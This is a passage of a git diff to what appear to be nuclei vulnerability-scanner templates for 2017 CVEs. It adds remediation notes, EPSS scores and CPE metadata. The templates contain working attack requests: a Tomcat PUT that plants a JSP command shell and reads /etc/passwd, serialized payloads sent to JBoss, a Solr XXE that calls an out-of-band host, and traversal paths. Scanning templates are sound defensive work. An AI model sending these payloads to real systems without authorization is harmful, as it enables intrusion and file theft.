Oracle to fix this vulnerability. Additionally, restrict network access to the WebLogic server and implement strong authentication mechanisms. reference: - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271 - https://github.com/SuperHacker-liuan/cve-2017-10271-poc - http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html - https://nvd.nist.gov/vuln/detail/CVE-2017-10271 + - http://www.securitytracker.com/id/1039608 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2017-10271 - tags: weblogic,oast,kev,vulhub,cve,cve2017,rce,oracle + epss-score: 0.97438 + epss-percentile: 0.9993 + cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: oracle + product: weblogic_server + tags: weblogic,oast,kev,vulhub,cve,cve2017,rce,oracle http: - raw: @@ -53,7 +61,6 @@ http: - - | POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: {{Hostname}} @@ -83,6 +90,7 @@ http: stop-at-first-match: true + matchers-condition: or matchers: - type: dsl @@ -98,4 +106,4 @@ http: - status_code == 200 condition: and -# Enhanced by mp on 2022/06/09 +# digest: 4a0a00473045022054a4e60fd9db3e8834ddeb0509fff87b4b9aa0d311a513bf692652fd41d93832022100eec9c1eaa9b6b47895ca3b2cb75423f86cc0208ea4773b322dc4e6cd5045c1df:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-10974.yaml b/http/cves/2017/CVE-2017-10974.yaml index 419e2afe3a..cf878b6986 100644 --- a/http/cves/2017/CVE-2017-10974.yaml +++ b/http/cves/2017/CVE-2017-10974.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Yaws 1.91 allows unauthenticated local file inclusion via /%5C../ submitted to port 8080. + remediation: | + Upgrade to a patched version of Yaws or apply the necessary security patches. reference: - https://www.exploit-db.com/exploits/42303 - https://nvd.nist.gov/vuln/detail/CVE-2017-10974 @@ -15,9 +17,14 @@ info: cvss-score: 7.5 cve-id: CVE-2017-10974 cwe-id: CWE-22 - tags: edb,cve,cve2017,yaws,lfi + epss-score: 0.96161 + epss-percentile: 0.99332 + cpe: cpe:2.3:a:yaws:yaws:1.91:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: yaws + product: yaws + tags: edb,cve,cve2017,yaws,lfi http: - method: GET @@ -26,6 +33,10 @@ http: matchers-condition: and matchers: + - type: dsl + dsl: + - '!contains(tolower(body), "" condition: and -# Enhanced by mp on 2022/06/09 +# digest: 490a0046304402204553696704bdc712c1219b0e57eed7894af723d6cb579f884ac520c2b07ce42502205efc30d62a890ae7e193e41d62a344c041c0f0d5444b3a292fb52b958a6343a9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-11629.yaml b/http/cves/2017/CVE-2017-11629.yaml index 1e9b9a6e9a..101d5c4492 100644 --- a/http/cves/2017/CVE-2017-11629.yaml +++ b/http/cves/2017/CVE-2017-11629.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | FineCMS through 5.0.10 contains a cross-site scripting vulnerability in controllers/api.php via the function parameter in a c=api&m=data2 request. + remediation: | + Upgrade to the latest version of FineCMS (>=5.0.11) which includes a fix for this vulnerability. reference: - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#api-php-Reflected-XSS @@ -15,9 +17,14 @@ info: cvss-score: 6.1 cve-id: CVE-2017-11629 cwe-id: CWE-79 + epss-score: 0.001 + epss-percentile: 0.40935 + cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 + vendor: finecms + product: finecms tags: cve,cve2017,xss,finecms http: @@ -41,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/31 +# digest: 490a0046304402200ab513afb13bf8c19e1b876dc6727252992ce771490109dda292996e9a99aab7022009a95f0b55003d6dc8b496241ae902d656f305e4a53cd6ffd45e21e5278c327b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-12138.yaml b/http/cves/2017/CVE-2017-12138.yaml index 127b25158d..04bb621a0b 100644 --- a/http/cves/2017/CVE-2017-12138.yaml +++ b/http/cves/2017/CVE-2017-12138.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: XOOPS Core 2.5.8 contains an open redirect vulnerability in /modules/profile/index.php due to the URL filter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest security patch or upgrade to a newer version of XOOPS Core to fix the open redirect vulnerability. reference: - https://github.com/XOOPS/XoopsCore25/issues/523 - https://xoops.org @@ -14,9 +16,14 @@ info: cvss-score: 6.1 cve-id: CVE-2017-12138 cwe-id: CWE-601 - tags: cve,cve2017,redirect,xoops,authenticated + epss-score: 0.00062 + epss-percentile: 0.24708 + cpe: cpe:2.3:a:xoops:xoops:2.5.8:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: xoops + product: xoops + tags: cve,cve2017,redirect,xoops,authenticated http: - raw: @@ -26,7 +33,6 @@ http: Content-Type: application/x-www-form-urlencoded uname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login - - | GET /modules/profile/index.php?op=main&xoops_redirect=https:www.interact.sh HTTP/1.1 Host: {{Hostname}} @@ -38,4 +44,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# Enhanced by md on 2022/10/13 +# digest: 490a0046304402202cfee10cbacb177f5ee7fee0e48b9ddbe9543d1f0c58b0dac6f34b9325700172022015fd64bf2c15b9a8d0a6a753844955dee65f58ecbc49e99db5280a614c3dc2b5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-12149.yaml b/http/cves/2017/CVE-2017-12149.yaml index 4196407987..aa860621ab 100644 --- a/http/cves/2017/CVE-2017-12149.yaml +++ b/http/cves/2017/CVE-2017-12149.yaml @@ -5,19 +5,27 @@ info: author: fopina,s0obi severity: critical description: Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2 is susceptible to a remote code execution vulnerability because the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization, thus allowing an attacker to execute arbitrary code via crafted serialized data. + remediation: | + Apply the latest security patches and updates provided by Jboss to fix this vulnerability. reference: - https://chowdera.com/2020/12/20201229190934023w.html - https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149 - https://nvd.nist.gov/vuln/detail/CVE-2017-12149 - https://bugzilla.redhat.com/show_bug.cgi?id=1486220 + - https://access.redhat.com/errata/RHSA-2018:1607 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-12149 cwe-id: CWE-502 - tags: java,rce,deserialization,kev,vulhub,cve,cve2017,jboss + epss-score: 0.9719 + epss-percentile: 0.9975 + cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:5.0.0:*:*:*:*:*:*:* metadata: max-request: 3 + vendor: redhat + product: jboss_enterprise_application_platform + tags: java,rce,deserialization,kev,vulhub,cve,cve2017,jboss,intrusive http: - raw: @@ -27,14 +35,12 @@ http: Content-Type: application/octet-stream {{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }} - - | POST /invoker/EJBInvokerServlet/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/octet-stream {{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }} - - | POST /invoker/readonly HTTP/1.1 Host: {{Hostname}} @@ -47,11 +53,11 @@ http: - type: word part: body words: - - "ClassCastException" + - ClassCastException - type: status status: - 200 - 500 -# Enhanced by mp on 2022/05/11 +# digest: 490a0046304402205abda443f82b0290699b4b50b6a2e613bbdec9b45530ee8da04d6887fe6e8caa02201f5346d7a2901333afb29e14bfaa3ea2de96ce09a3c1cdd6ab88e8d11016eda6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-12542.yaml b/http/cves/2017/CVE-2017-12542.yaml index e5a4e00a36..e68816c80c 100644 --- a/http/cves/2017/CVE-2017-12542.yaml +++ b/http/cves/2017/CVE-2017-12542.yaml @@ -5,18 +5,26 @@ info: author: pikpikcu severity: critical description: HPE Integrated Lights-out 4 (iLO 4) prior to 2.53 was found to contain an authentication bypass and code execution vulnerability. + remediation: | + Upgrade HPE Integrated Lights-out 4 (ILO4) to version 2.53 or later to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/44005 - https://nvd.nist.gov/vuln/detail/CVE-2017-12542 - https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us - https://www.exploit-db.com/exploits/44005/ + - http://www.securitytracker.com/id/1039222 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2017-12542 - tags: ilo4,hpe,auth-bypass,edb,cve,cve2017 + epss-score: 0.97377 + epss-percentile: 0.99878 + cpe: cpe:2.3:o:hp:integrated_lights-out_4_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: hp + product: integrated_lights-out_4_firmware + tags: ilo4,hpe,auth-bypass,edb,cve,cve2017 http: - method: GET @@ -42,4 +50,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/11 +# digest: 490a004630440220040a356154a5a80d1a535d246e6e452de26b1c591ca87002600c425a8e1cd03e0220027b44d074a90965e0412a69c971160c03d6319f788fc67c08b40b0ec5038fc2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-12544.yaml b/http/cves/2017/CVE-2017-12544.yaml index aa326183b1..defe838301 100644 --- a/http/cves/2017/CVE-2017-12544.yaml +++ b/http/cves/2017/CVE-2017-12544.yaml @@ -5,18 +5,26 @@ info: author: divya_mudgal severity: medium description: HPE System Management contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Apply the latest security patches or updates provided by HPE to fix the XSS vulnerability in the System Management software. reference: - https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbmu03753en_us - http://web.archive.org/web/20211206092413/https://securitytracker.com/id/1039437 - https://nvd.nist.gov/vuln/detail/CVE-2017-12544 + - http://www.securitytracker.com/id/1039437 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2017-12544 cwe-id: CWE-79 - tags: cve,cve2017,xss,hp + epss-score: 0.96723 + epss-percentile: 0.99535 + cpe: cpe:2.3:a:hp:system_management_homepage:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: hp + product: system_management_homepage + tags: cve,cve2017,xss,hp http: - method: GET @@ -26,17 +34,17 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "var prodName = '';prompt`document.domain`;//';" - part: body - type: word + part: header words: - "text/html" - part: header - type: status status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 490a0046304402201f1dd86ce6fc368353a81aa8c1b6369aea31b58c46437fe1dc9365bf3e9664c402201519a70da221a9f57ce54937ea6928a68406bea5f37e6d44705f324068b58ce1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-12583.yaml b/http/cves/2017/CVE-2017-12583.yaml index 17341ed85f..36b1d8a835 100644 --- a/http/cves/2017/CVE-2017-12583.yaml +++ b/http/cves/2017/CVE-2017-12583.yaml @@ -5,6 +5,8 @@ info: author: DhiyaneshDK severity: medium description: DokuWiki through 2017-02-19b contains a cross-site scripting vulnerability in the DATE_AT parameter to doku.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to the latest version of DokuWiki or apply the provided patch to fix the XSS vulnerability. reference: - https://github.com/splitbrain/dokuwiki/issues/2061 - https://nvd.nist.gov/vuln/detail/CVE-2017-12583 @@ -13,8 +15,13 @@ info: cvss-score: 6.1 cve-id: CVE-2017-12583 cwe-id: CWE-79 + epss-score: 0.001 + epss-percentile: 0.40935 + cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: dokuwiki + product: dokuwiki shodan-query: http.title:"DokuWiki" tags: cve,cve2017,xss,dokuwiki @@ -39,4 +46,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 490a0046304402204c92a5a44fe76f06807ffde4f90ec27f867034dc9dcc95a037ceaf2a3569c7e902200ba16126ff589c9cd762fefed42ac2cb24c0cb84a0619366ff49f30900a83e17:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-12611.yaml b/http/cves/2017/CVE-2017-12611.yaml index 789cb2a0d5..236616614e 100644 --- a/http/cves/2017/CVE-2017-12611.yaml +++ b/http/cves/2017/CVE-2017-12611.yaml @@ -5,18 +5,27 @@ info: author: pikpikcu severity: critical description: Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1 uses an unintentional expression in a Freemarker tag instead of string literals, which makes it susceptible to remote code execution attacks. + remediation: | + Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2. reference: - https://struts.apache.org/docs/s2-053.html - https://nvd.nist.gov/vuln/detail/CVE-2017-12611 - https://kb.netapp.com/support/s/article/ka51A000000CgttQAC/NTAP-20170911-0001 + - http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-003.txt + - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-12611 cwe-id: CWE-20 - tags: cve,cve2017,apache,rce,struts + epss-score: 0.97358 + epss-percentile: 0.99863 + cpe: cpe:2.3:a:apache:struts:2.0.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: apache + product: struts + tags: cve,cve2017,apache,rce,struts http: - method: POST @@ -25,7 +34,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -34,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/11 +# digest: 4a0a00473045022026e035d4ae32458ff1b21e91bc932ea1bdb437750aaf088585e45bf189fa3d72022100c94a4a8fe1ff43083cde958ffd99a06ad83e0a26fc19c039efc0d32458bf88b2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-12615.yaml b/http/cves/2017/CVE-2017-12615.yaml index 31dc6cd7e4..d125f4754c 100644 --- a/http/cves/2017/CVE-2017-12615.yaml +++ b/http/cves/2017/CVE-2017-12615.yaml @@ -6,28 +6,34 @@ info: severity: high description: | Apache Tomcat servers 7.0.{0 to 79} are susceptible to remote code execution. By design, you are not allowed to upload JSP files via the PUT method. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on Apache Tomcat servers that have enabled PUT method by using a specially crafted HTTP request. + remediation: | + Apply the latest security patches or upgrade to a non-vulnerable version of Apache Tomcat. reference: - https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615 - https://lists.apache.org/thread.html/8fcb1e2d5895413abcf266f011b9918ae03e0b7daceb118ffbf23f8c@%3Cannounce.tomcat.apache.org%3E - http://web.archive.org/web/20211206035549/https://securitytracker.com/id/1039392 - https://nvd.nist.gov/vuln/detail/CVE-2017-12615 - - http://web.archive.org/web/20210616200000/https://www.securityfocus.com/bid/100901 + - http://breaktoprotect.blogspot.com/2017/09/the-case-of-cve-2017-12615-tomcat-7-put.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2017-12615 cwe-id: CWE-434 + epss-score: 0.97499 + epss-percentile: 0.99974 + cpe: cpe:2.3:a:apache:tomcat:7.0:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: apache + product: tomcat shodan-query: title:"Apache Tomcat" - tags: rce,tomcat,kev,cisa,vulhub,cve,cve2017,apache,fileupload + tags: rce,tomcat,kev,vulhub,cve,cve2017,apache,fileupload,intrusive http: - method: PUT path: - "{{BaseURL}}/poc.jsp/" - headers: - Content-Type: application/x-www-form-urlencoded + body: | <%@ page import="java.util.*,java.io.*"%> <% @@ -45,6 +51,9 @@ http: } %> + headers: + Content-Type: application/x-www-form-urlencoded + - method: GET path: - "{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd" @@ -59,4 +68,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/09 +# digest: 4b0a00483046022100a3cdcb5d83f4211278a3087007b8f087e9771a0d55efe766db8780fa9a37e761022100b1049b1a0cb2055b0fe1563692760c2e15e74ead15f2c17d4a9e450c63af8807:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-12617.yaml b/http/cves/2017/CVE-2017-12617.yaml index 62e33bc1bf..c2592ec9e6 100644 --- a/http/cves/2017/CVE-2017-12617.yaml +++ b/http/cves/2017/CVE-2017-12617.yaml @@ -1,4 +1,4 @@ -id: CVE-2017-12617 +id: "CVE-2017-12617" info: name: Apache Tomcat - Remote Code Execution @@ -6,18 +6,27 @@ info: severity: high description: | When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server. + remediation: | + Upgrade to Apache Tomcat version 7.0.80 or later to mitigate this vulnerability. reference: - https://versa-networks.com/blog/apache-tomcat-remote-code-execution-vulnerability-cve-2017-12617/ - https://github.com/cyberheartmi9/CVE-2017-12617 - https://www.exploit-db.com/exploits/43008 - https://nvd.nist.gov/vuln/detail/CVE-2017-12617 + - http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.3 + cvss-score: 8.1 + cve-id: "CVE-2017-12617" cwe-id: CWE-434 + epss-score: 0.97494 + epss-percentile: 0.99971 + cpe: cpe:2.3:a:apache:tomcat:7.0.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 2 + vendor: apache + product: tomcat shodan-query: html:"Apache Tomcat" tags: cve,cve2017,tomcat,apache,rce,kev,intrusive @@ -42,3 +51,5 @@ http: - type: status status: - 200 + +# digest: 490a0046304402207fe07a5cb47829aa6fa48562cb24fa5a49457fa9dfd763dce35e8c8444bb956c022011a4677b3522f60a15dc6328603d97c9201725dd6f0f76bd60b782e5fc1ad0b0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-12629.yaml b/http/cves/2017/CVE-2017-12629.yaml index d574c8f11c..c270b18846 100644 --- a/http/cves/2017/CVE-2017-12629.yaml +++ b/http/cves/2017/CVE-2017-12629.yaml @@ -5,43 +5,49 @@ info: author: dwisiswant0 severity: critical description: Apache Solr with Apache Lucene before 7.1 is susceptible to remote code execution by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr. + remediation: | + Upgrade to a patched version of Apache Solr (7.2 or higher) or apply the recommended security patches. reference: - https://twitter.com/honoki/status/1298636315613974532 - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE - https://nvd.nist.gov/vuln/detail/CVE-2017-12629 + - http://mail-archives.us.apache.org/mod_mbox/www-announce/201710.mbox/%3CCAOOKt51UO_6Vy%3Dj8W%3Dx1pMbLW9VJfZyFWz7pAnXJC_OAdSZubA%40mail.gmail.com%3E classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-12629 cwe-id: CWE-611 - epss-score: 0.97449 - tags: oast,xxe,vulhub,cve,cve2017,solr,apache + epss-score: 0.97423 + epss-percentile: 0.99913 + cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: apache + product: solr + tags: oast,xxe,vulhub,cve,cve2017,solr,apache http: - raw: - | GET /solr/admin/cores?wt=json HTTP/1.1 Host: {{Hostname}} - - | GET /solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{{interactsh-url}}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser HTTP/1.1 Host: {{Hostname}} matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" extractors: - type: regex - internal: true name: core group: 1 regex: - '"name"\:"(.*?)"' + internal: true -# Enhanced by mp on 2022/04/26 +# digest: 4a0a004730450221008b1e86159e6ae72663dc9c4593d79db4526d6a6a6430efbbb2518a8aa367048f02207a369c79fd8cf9ce43a2178deb6021d755bae6a6effba83a84fca45c03e2a84f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-12635.yaml b/http/cves/2017/CVE-2017-12635.yaml index a2659354af..588207a6df 100644 --- a/http/cves/2017/CVE-2017-12635.yaml +++ b/http/cves/2017/CVE-2017-12635.yaml @@ -5,19 +5,27 @@ info: author: pikpikcu severity: critical description: Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keysfor 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behavior that if two 'roles' keys are available in the JSON, the second one will be used for authorizing the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges. + remediation: | + Upgrade Apache CouchDB to version 2.1.1 or later. reference: - https://nvd.nist.gov/vuln/detail/CVE-2017-12635 - https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E - - http://web.archive.org/web/20210414010253/https://www.securityfocus.com/bid/101868 - https://security.gentoo.org/glsa/201711-16 + - https://lists.debian.org/debian-lts-announce/2018/01/msg00026.html + - https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbmu03935en_us classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-12635 cwe-id: CWE-269 - tags: cve,cve2017,couchdb,apache + epss-score: 0.97516 + epss-percentile: 0.99983 + cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: apache + product: couchdb + tags: cve,cve2017,couchdb,apache,intrusive http: - raw: @@ -39,19 +47,19 @@ http: - type: word part: header words: - - "application/json" + - application/json - "Location:" - type: word part: body words: - - "org.couchdb.user:poc" - - "conflict" - - "Document update conflict" + - org.couchdb.user:poc + - conflict + - Document update conflict - type: status status: - 201 - 409 -# Enhanced by mp on 2022/05/11 +# digest: 490a00463044022077d728d98493ac05f5fbc9afd441d235de84323c6a6a5ef1e5776f07e185a15902204efe35f33e0950403be9909a4f26ed4cf21d9acc2d1cf828ac406d41fd414282:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml index 4f7b6f6235..45e0940171 100644 --- a/http/cves/2017/CVE-2017-12637.yaml +++ b/http/cves/2017/CVE-2017-12637.yaml @@ -5,6 +5,8 @@ info: author: apt-mirror severity: high description: SAP NetWeaver Application Server Java 7.5 is susceptible to local file inclusion in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657. + remediation: | + Apply the latest security patches and updates provided by SAP to fix the LFI vulnerability in SAP NetWeaver Application Server Java 7.5. reference: - https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf - https://web.archive.org/web/20170807202056/http://www.sh0w.top/index.php/archives/7/ @@ -15,10 +17,13 @@ info: cvss-score: 7.5 cve-id: CVE-2017-12637 cwe-id: CWE-22 - cpe: cpe:2.3:a:sap:netweaver_application_server_java:*:*:*:*:*:*:*:* epss-score: 0.00648 + epss-percentile: 0.77024 + cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: sap + product: netweaver_application_server_java shodan-query: http.favicon.hash:-266008933 tags: cve,cve2017,sap,lfi,java,traversal @@ -26,16 +31,18 @@ http: - method: GET path: - "{{BaseURL}}/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.." + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word + part: body words: - "WEB-INF" - "META-INF" condition: and - part: body -# Enhanced by mp on 2022/06/09 + - type: status + status: + - 200 + +# digest: 4b0a0048304602210092ff62655b4142d5e45643b160bb65eb1f41bae44669c1dafb0aa774d6965f7c02210089bb31ced7a9be94149c5e2be0f95ec08d9fa3084c1e7da49700da781719efba:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml index 6764f0ceab..df209ca192 100644 --- a/http/cves/2017/CVE-2017-12794.yaml +++ b/http/cves/2017/CVE-2017-12794.yaml @@ -6,19 +6,27 @@ info: severity: medium description: | Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allows a cross-site scripting attack. This vulnerability shouldn't affect most production sites since run with "DEBUG = True" is not on by default (which is what makes the page visible). + remediation: | + Upgrade to a patched version of Django or apply the necessary security patches provided by the Django project. reference: - https://twitter.com/sec715/status/1406779605055270914 - https://nvd.nist.gov/vuln/detail/CVE-2017-12794 - https://www.djangoproject.com/weblog/2017/sep/05/security-releases/ - http://web.archive.org/web/20211207172022/https://securitytracker.com/id/1039264 + - http://www.securitytracker.com/id/1039264 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-12794 cwe-id: CWE-79 - tags: xss,django,cve,cve2017 + epss-score: 0.00219 + epss-percentile: 0.59673 + cpe: cpe:2.3:a:djangoproject:django:1.10.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: djangoproject + product: django + tags: xss,django,cve,cve2017 http: - method: GET @@ -28,17 +36,17 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body + + - type: word + part: header + words: + - "text/html" - type: status status: - 200 - - type: word - words: - - "text/html" - part: header - -# Enhanced by mp on 2022/04/26 +# digest: 4a0a00473045022100de69e9c4bd4ca3b36ab892a6ccfc84f6e0f69dc6d0ab44cbe5bc96b68ab3af5002205c1cbe252d5087bd96130a509cf074b83bd082fc1c43e80e7b11e168382981b9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml index c112d9132a..5084be9c2d 100644 --- a/http/cves/2017/CVE-2017-14135.yaml +++ b/http/cves/2017/CVE-2017-14135.yaml @@ -5,6 +5,8 @@ info: author: alph4byt3 severity: critical description: OpenDreambox 2.0.0 is susceptible to remote code execution via the webadmin plugin. Remote attackers can execute arbitrary OS commands via shell metacharacters in the command parameter to the /script URI in enigma2-plugins/blob/master/webadmin/src/WebChilds/Script.py. + remediation: | + Apply the latest security patches or upgrade to a patched version of OpenDreambox. reference: - https://the-infosec.com/2017/05/12/from-shodan-to-rce-opendreambox-2-0-0-code-execution/ - https://www.exploit-db.com/exploits/42293 @@ -15,8 +17,13 @@ info: cvss-score: 9.8 cve-id: CVE-2017-14135 cwe-id: CWE-78 + epss-score: 0.96679 + epss-percentile: 0.99516 + cpe: cpe:2.3:a:dreambox:opendreambox:2.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: dreambox + product: opendreambox shodan-query: title:"Dreambox WebControl" tags: 